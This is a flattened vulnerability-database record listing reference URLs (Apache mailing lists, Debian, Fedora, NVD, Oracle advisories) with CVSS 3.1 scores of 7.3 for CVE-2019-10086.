url https://lists.apache.org/thread.html/2fd61dc89df9aeab738d2b49f48d42c76f7d53b980ba04e1d48bce48%40%3Cdev.shiro.apache.org%3E
21
reference_url https://lists.apache.org/thread.html/3d1ed1a1596c08c4d5fea97b36c651ce167b773f1afc75251ce7a125@%3Ccommits.tinkerpop.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/3d1ed1a1596c08c4d5fea97b36c651ce167b773f1afc75251ce7a125@%3Ccommits.tinkerpop.apache.org%3E
22
reference_url https://lists.apache.org/thread.html/3d1ed1a1596c08c4d5fea97b36c651ce167b773f1afc75251ce7a125%40%3Ccommits.tinkerpop.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/3d1ed1a1596c08c4d5fea97b36c651ce167b773f1afc75251ce7a125%40%3Ccommits.tinkerpop.apache.org%3E
23
reference_url https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E
24
reference_url https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E
25
reference_url https://lists.apache.org/thread.html/5261066cd7adee081ee05c8bf0e96cf0b2eeaced391e19117ae4daa6@%3Cdev.shiro.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/5261066cd7adee081ee05c8bf0e96cf0b2eeaced391e19117ae4daa6@%3Cdev.shiro.apache.org%3E
26
reference_url https://lists.apache.org/thread.html/5261066cd7adee081ee05c8bf0e96cf0b2eeaced391e19117ae4daa6%40%3Cdev.shiro.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/5261066cd7adee081ee05c8bf0e96cf0b2eeaced391e19117ae4daa6%40%3Cdev.shiro.apache.org%3E
27
reference_url https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3Cissues.commons.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3Cissues.commons.apache.org%3E
28
reference_url https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3Cissues.commons.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3Cissues.commons.apache.org%3E
29
reference_url https://lists.apache.org/thread.html/a684107d3a78e431cf0fbb90629e8559a36ff8fe94c3a76e620b39fa@%3Cdev.shiro.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/a684107d3a78e431cf0fbb90629e8559a36ff8fe94c3a76e620b39fa@%3Cdev.shiro.apache.org%3E
30
reference_url https://lists.apache.org/thread.html/a684107d3a78e431cf0fbb90629e8559a36ff8fe94c3a76e620b39fa%40%3Cdev.shiro.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/a684107d3a78e431cf0fbb90629e8559a36ff8fe94c3a76e620b39fa%40%3Cdev.shiro.apache.org%3E
31
reference_url https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E
32
reference_url https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E
33
reference_url https://lists.apache.org/thread.html/c94bc9649d5109a663b2129371dc45753fbdeacd340105548bbe93c3@%3Cdev.shiro.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/c94bc9649d5109a663b2129371dc45753fbdeacd340105548bbe93c3@%3Cdev.shiro.apache.org%3E
34
reference_url https://lists.apache.org/thread.html/c94bc9649d5109a663b2129371dc45753fbdeacd340105548bbe93c3%40%3Cdev.shiro.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/c94bc9649d5109a663b2129371dc45753fbdeacd340105548bbe93c3%40%3Cdev.shiro.apache.org%3E
35
reference_url https://lists.apache.org/thread.html/d6ca9439c53374b597f33b7ec180001625597db48ea30356af01145f@%3Cdev.shiro.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/d6ca9439c53374b597f33b7ec180001625597db48ea30356af01145f@%3Cdev.shiro.apache.org%3E
36
reference_url https://lists.apache.org/thread.html/d6ca9439c53374b597f33b7ec180001625597db48ea30356af01145f%40%3Cdev.shiro.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/d6ca9439c53374b597f33b7ec180001625597db48ea30356af01145f%40%3Cdev.shiro.apache.org%3E
37
reference_url https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E
38
reference_url https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E
39
reference_url https://lists.apache.org/thread.html/r18d8b4f9263e5cad3bbaef0cdba0e2ccdf9201316ac4b85e23eb7ee4@%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r18d8b4f9263e5cad3bbaef0cdba0e2ccdf9201316ac4b85e23eb7ee4@%3Cdev.atlas.apache.org%3E
40
reference_url https://lists.apache.org/thread.html/r18d8b4f9263e5cad3bbaef0cdba0e2ccdf9201316ac4b85e23eb7ee4%40%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r18d8b4f9263e5cad3bbaef0cdba0e2ccdf9201316ac4b85e23eb7ee4%40%3Cdev.atlas.apache.org%3E
41
reference_url https://lists.apache.org/thread.html/r2d5f1d88c39bd615271abda63964a0bee9b2b57fef1f84cb4c43032e@%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r2d5f1d88c39bd615271abda63964a0bee9b2b57fef1f84cb4c43032e@%3Cissues.nifi.apache.org%3E
42
reference_url https://lists.apache.org/thread.html/r2d5f1d88c39bd615271abda63964a0bee9b2b57fef1f84cb4c43032e%40%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r2d5f1d88c39bd615271abda63964a0bee9b2b57fef1f84cb4c43032e%40%3Cissues.nifi.apache.org%3E
43
reference_url https://lists.apache.org/thread.html/r306c0322aa5c0da731e03f3ce9f07f4745c052c6b73f4e78faf232ca@%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r306c0322aa5c0da731e03f3ce9f07f4745c052c6b73f4e78faf232ca@%3Cdev.atlas.apache.org%3E
44
reference_url https://lists.apache.org/thread.html/r306c0322aa5c0da731e03f3ce9f07f4745c052c6b73f4e78faf232ca%40%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r306c0322aa5c0da731e03f3ce9f07f4745c052c6b73f4e78faf232ca%40%3Cdev.atlas.apache.org%3E
45
reference_url https://lists.apache.org/thread.html/r43de02fd4a4f52c4bdeff8c02f09625d83cd047498009c1cdab857db@%3Cdev.rocketmq.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r43de02fd4a4f52c4bdeff8c02f09625d83cd047498009c1cdab857db@%3Cdev.rocketmq.apache.org%3E
46
reference_url https://lists.apache.org/thread.html/r43de02fd4a4f52c4bdeff8c02f09625d83cd047498009c1cdab857db%40%3Cdev.rocketmq.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r43de02fd4a4f52c4bdeff8c02f09625d83cd047498009c1cdab857db%40%3Cdev.rocketmq.apache.org%3E
47
reference_url https://lists.apache.org/thread.html/r46e536fc98942dce99fadd2e313aeefe90c1a769c5cd85d98df9d098@%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r46e536fc98942dce99fadd2e313aeefe90c1a769c5cd85d98df9d098@%3Cissues.nifi.apache.org%3E
48
reference_url https://lists.apache.org/thread.html/r46e536fc98942dce99fadd2e313aeefe90c1a769c5cd85d98df9d098%40%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r46e536fc98942dce99fadd2e313aeefe90c1a769c5cd85d98df9d098%40%3Cissues.nifi.apache.org%3E
49
reference_url https://lists.apache.org/thread.html/r513a7a21c422170318115463b399dd58ab447fe0990b13e5884f0825@%3Ccommits.dolphinscheduler.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r513a7a21c422170318115463b399dd58ab447fe0990b13e5884f0825@%3Ccommits.dolphinscheduler.apache.org%3E
50
reference_url https://lists.apache.org/thread.html/r513a7a21c422170318115463b399dd58ab447fe0990b13e5884f0825%40%3Ccommits.dolphinscheduler.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r513a7a21c422170318115463b399dd58ab447fe0990b13e5884f0825%40%3Ccommits.dolphinscheduler.apache.org%3E
51
reference_url https://lists.apache.org/thread.html/r6194ced4828deb32023cd314e31f41c61d388b58935d102c7de91f58@%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r6194ced4828deb32023cd314e31f41c61d388b58935d102c7de91f58@%3Cdev.atlas.apache.org%3E
52
reference_url https://lists.apache.org/thread.html/r6194ced4828deb32023cd314e31f41c61d388b58935d102c7de91f58%40%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r6194ced4828deb32023cd314e31f41c61d388b58935d102c7de91f58%40%3Cdev.atlas.apache.org%3E
53
reference_url https://lists.apache.org/thread.html/r967953a14e05016bc4bcae9ef3dd92e770181158b4246976ed8295c9@%3Cdev.brooklyn.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r967953a14e05016bc4bcae9ef3dd92e770181158b4246976ed8295c9@%3Cdev.brooklyn.apache.org%3E
54
reference_url https://lists.apache.org/thread.html/r967953a14e05016bc4bcae9ef3dd92e770181158b4246976ed8295c9%40%3Cdev.brooklyn.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r967953a14e05016bc4bcae9ef3dd92e770181158b4246976ed8295c9%40%3Cdev.brooklyn.apache.org%3E
55
reference_url https://lists.apache.org/thread.html/ra41fd0ad4b7e1d675c03a5081a16a6603085a4e37d30b866067566fe@%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/ra41fd0ad4b7e1d675c03a5081a16a6603085a4e37d30b866067566fe@%3Cissues.nifi.apache.org%3E
56
reference_url https://lists.apache.org/thread.html/ra41fd0ad4b7e1d675c03a5081a16a6603085a4e37d30b866067566fe%40%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/ra41fd0ad4b7e1d675c03a5081a16a6603085a4e37d30b866067566fe%40%3Cissues.nifi.apache.org%3E
57
reference_url https://lists.apache.org/thread.html/ra87ac17410a62e813cba901fdd4e9a674dd53daaf714870f28e905f1@%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/ra87ac17410a62e813cba901fdd4e9a674dd53daaf714870f28e905f1@%3Cdev.atlas.apache.org%3E
58
reference_url https://lists.apache.org/thread.html/ra87ac17410a62e813cba901fdd4e9a674dd53daaf714870f28e905f1%40%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/ra87ac17410a62e813cba901fdd4e9a674dd53daaf714870f28e905f1%40%3Cdev.atlas.apache.org%3E
59
reference_url https://lists.apache.org/thread.html/ra9a139fdc0999750dcd519e81384bc1fe3946f311b1796221205f51c@%3Ccommits.dolphinscheduler.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/ra9a139fdc0999750dcd519e81384bc1fe3946f311b1796221205f51c@%3Ccommits.dolphinscheduler.apache.org%3E
60
reference_url https://lists.apache.org/thread.html/ra9a139fdc0999750dcd519e81384bc1fe3946f311b1796221205f51c%40%3Ccommits.dolphinscheduler.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/ra9a139fdc0999750dcd519e81384bc1fe3946f311b1796221205f51c%40%3Ccommits.dolphinscheduler.apache.org%3E
61
reference_url https://lists.apache.org/thread.html/racd3e7b2149fa2f255f016bd6bffab0fea77b6fb81c50db9a17f78e6@%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/racd3e7b2149fa2f255f016bd6bffab0fea77b6fb81c50db9a17f78e6@%3Cdev.atlas.apache.org%3E
62
reference_url https://lists.apache.org/thread.html/racd3e7b2149fa2f255f016bd6bffab0fea77b6fb81c50db9a17f78e6%40%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/racd3e7b2149fa2f255f016bd6bffab0fea77b6fb81c50db9a17f78e6%40%3Cdev.atlas.apache.org%3E
63
reference_url https://lists.apache.org/thread.html/rae81e0c8ebdf47ffaa85a01240836bfece8a990c48f55c7933162b5c@%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rae81e0c8ebdf47ffaa85a01240836bfece8a990c48f55c7933162b5c@%3Cdev.atlas.apache.org%3E
64
reference_url https://lists.apache.org/thread.html/rae81e0c8ebdf47ffaa85a01240836bfece8a990c48f55c7933162b5c%40%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rae81e0c8ebdf47ffaa85a01240836bfece8a990c48f55c7933162b5c%40%3Cdev.atlas.apache.org%3E
65
reference_url https://lists.apache.org/thread.html/rb1f76c2c0a4d6efb8a3523974f9d085d5838b73e7bffdf9a8f212997@%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb1f76c2c0a4d6efb8a3523974f9d085d5838b73e7bffdf9a8f212997@%3Cissues.nifi.apache.org%3E
66
reference_url https://lists.apache.org/thread.html/rb1f76c2c0a4d6efb8a3523974f9d085d5838b73e7bffdf9a8f212997%40%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rb1f76c2c0a4d6efb8a3523974f9d085d5838b73e7bffdf9a8f212997%40%3Cissues.nifi.apache.org%3E
67
reference_url https://lists.apache.org/thread.html/rb8dac04cb7e9cc5dedee8dabaa1c92614f590642e5ebf02a145915ba@%3Ccommits.atlas.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb8dac04cb7e9cc5dedee8dabaa1c92614f590642e5ebf02a145915ba@%3Ccommits.atlas.apache.org%3E
68
reference_url https://lists.apache.org/thread.html/rb8dac04cb7e9cc5dedee8dabaa1c92614f590642e5ebf02a145915ba%40%3Ccommits.atlas.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rb8dac04cb7e9cc5dedee8dabaa1c92614f590642e5ebf02a145915ba%40%3Ccommits.atlas.apache.org%3E
69
reference_url https://lists.apache.org/thread.html/rcc029be4edaaf5b8bb85818aab494e16f312fced07a0f4a202771ba2@%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rcc029be4edaaf5b8bb85818aab494e16f312fced07a0f4a202771ba2@%3Cissues.nifi.apache.org%3E
70
reference_url https://lists.apache.org/thread.html/rcc029be4edaaf5b8bb85818aab494e16f312fced07a0f4a202771ba2%40%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rcc029be4edaaf5b8bb85818aab494e16f312fced07a0f4a202771ba2%40%3Cissues.nifi.apache.org%3E
71
reference_url https://lists.apache.org/thread.html/rd2d2493f4f1af6980d265b8d84c857e2b7ab80a46e1423710c448957@%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rd2d2493f4f1af6980d265b8d84c857e2b7ab80a46e1423710c448957@%3Cissues.nifi.apache.org%3E
72
reference_url https://lists.apache.org/thread.html/rd2d2493f4f1af6980d265b8d84c857e2b7ab80a46e1423710c448957%40%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rd2d2493f4f1af6980d265b8d84c857e2b7ab80a46e1423710c448957%40%3Cissues.nifi.apache.org%3E
73
reference_url https://lists.apache.org/thread.html/re2028d4d76ba1db3e3c3a722d6c6034e801cc3b309f69cc166eaa32b@%3Ccommits.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/re2028d4d76ba1db3e3c3a722d6c6034e801cc3b309f69cc166eaa32b@%3Ccommits.nifi.apache.org%3E
74
reference_url https://lists.apache.org/thread.html/re2028d4d76ba1db3e3c3a722d6c6034e801cc3b309f69cc166eaa32b%40%3Ccommits.nifi.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/re2028d4d76ba1db3e3c3a722d6c6034e801cc3b309f69cc166eaa32b%40%3Ccommits.nifi.apache.org%3E
75
reference_url https://lists.apache.org/thread.html/re3cd7cb641d7fc6684e4fc3c336a8bad4a01434bb5625a06e3600fd1@%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/re3cd7cb641d7fc6684e4fc3c336a8bad4a01434bb5625a06e3600fd1@%3Cissues.nifi.apache.org%3E
76
reference_url https://lists.apache.org/thread.html/re3cd7cb641d7fc6684e4fc3c336a8bad4a01434bb5625a06e3600fd1%40%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/re3cd7cb641d7fc6684e4fc3c336a8bad4a01434bb5625a06e3600fd1%40%3Cissues.nifi.apache.org%3E
77
reference_url https://lists.apache.org/thread.html/rec74f3a94dd850259c730b4ba6f7b6211222b58900ec088754aa0534@%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rec74f3a94dd850259c730b4ba6f7b6211222b58900ec088754aa0534@%3Cissues.nifi.apache.org%3E
78
reference_url https://lists.apache.org/thread.html/rec74f3a94dd850259c730b4ba6f7b6211222b58900ec088754aa0534%40%3Cissues.nifi.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rec74f3a94dd850259c730b4ba6f7b6211222b58900ec088754aa0534%40%3Cissues.nifi.apache.org%3E
79
reference_url https://lists.apache.org/thread.html/reee57101464cf7622d640ae013b2162eb864f603ec4093de8240bb8f@%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/reee57101464cf7622d640ae013b2162eb864f603ec4093de8240bb8f@%3Cdev.atlas.apache.org%3E
80
reference_url https://lists.apache.org/thread.html/reee57101464cf7622d640ae013b2162eb864f603ec4093de8240bb8f%40%3Cdev.atlas.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/reee57101464cf7622d640ae013b2162eb864f603ec4093de8240bb8f%40%3Cdev.atlas.apache.org%3E
81
reference_url https://lists.debian.org/debian-lts-announce/2019/08/msg00030.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2019/08/msg00030.html
82
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4APPGLBWMFAS4WHNLR4LIJ65DJGPV7TF/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4APPGLBWMFAS4WHNLR4LIJ65DJGPV7TF/
83
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIUYSL2RSIWZVNSUIXJTIFPIPIF6OAIO/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIUYSL2RSIWZVNSUIXJTIFPIPIF6OAIO/
84
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4APPGLBWMFAS4WHNLR4LIJ65DJGPV7TF
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4APPGLBWMFAS4WHNLR4LIJ65DJGPV7TF
85
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4APPGLBWMFAS4WHNLR4LIJ65DJGPV7TF/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4APPGLBWMFAS4WHNLR4LIJ65DJGPV7TF/
86
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIUYSL2RSIWZVNSUIXJTIFPIPIF6OAIO
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIUYSL2RSIWZVNSUIXJTIFPIPIF6OAIO
87
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIUYSL2RSIWZVNSUIXJTIFPIPIF6OAIO/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIUYSL2RSIWZVNSUIXJTIFPIPIF6OAIO/
88
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-10086
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:P/I:P/A:P
1
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2019-10086
89
reference_url https://www.oracle.com/security-alerts/cpuapr2020.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuapr2020.html
90
reference_url https://www.oracle.com/security-alerts/cpuApr2021.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuApr2021.html
91
